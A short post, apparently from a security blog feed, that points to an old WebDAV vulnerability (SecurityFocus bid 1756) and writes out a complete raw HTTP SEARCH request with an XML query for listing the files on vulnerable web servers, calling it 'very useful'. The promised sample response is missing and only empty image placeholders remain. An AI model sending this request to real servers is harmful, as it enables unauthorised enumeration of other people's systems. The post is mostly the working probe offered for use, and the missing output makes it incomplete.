This: http://www.securityfocus.com/bid/1756 still works (on vulnerable hosts, this is an old vuln) and is very useful:
Send this:
SEARCH / HTTP/1.1 Host: target Content-Type: text/xml Content-Length: 133 <?xml version="1.0"?> <g:searchrequest xmlns:g="DAV:"> <g:sql> Select "DAV:displayname" from scope() </g:sql> </g:searchrequest> And expect something like this back:![]()
![]()
![]()
![]()
![]()
↧